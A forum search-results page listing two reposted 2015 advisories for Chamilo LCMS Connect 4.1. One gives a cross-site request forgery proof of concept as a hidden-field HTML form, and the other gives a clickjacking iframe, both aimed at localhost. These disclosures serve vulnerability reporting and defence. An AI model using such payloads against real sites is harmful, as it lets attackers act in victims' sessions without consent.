Jump to content

Search the Community

Showing results for tags 'lcms'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Occupation

Interests

Biography

Location

Found 2 results

  1. Aerosol
    Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: XSRF #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages he could control the user's actions. #Proof of Concept (PoC): ------------------------------------ <form method="POST" name="form1" action=" http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem "> <input type="hidden" name="parent" value="0"/> <input type="hidden" name="title[de]" value=""/> <input type="hidden" name="title[en]" value="tester"/> <input type="hidden" name="title[fr]" value=""/> <input type="hidden" name="title[nl]" value=""/> <input type="hidden" name="application" value="weblcms"/> <input type="hidden" name="submit_button" value="Create"/> <input type="hidden" name="_qf__item" value=""/> <input type="hidden" name="type" value="core\menu\ApplicationItem"/> </form> -- Regards, *Joel V* Source
  2. Aerosol
    Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: Clickjacking #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. LCMS connect is susceptible to clickjacking attack. #Proof of Concept (PoC): ------------------------------------ <iframe src="http://localhost/Chamilo/" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source
×
×
  • Create New...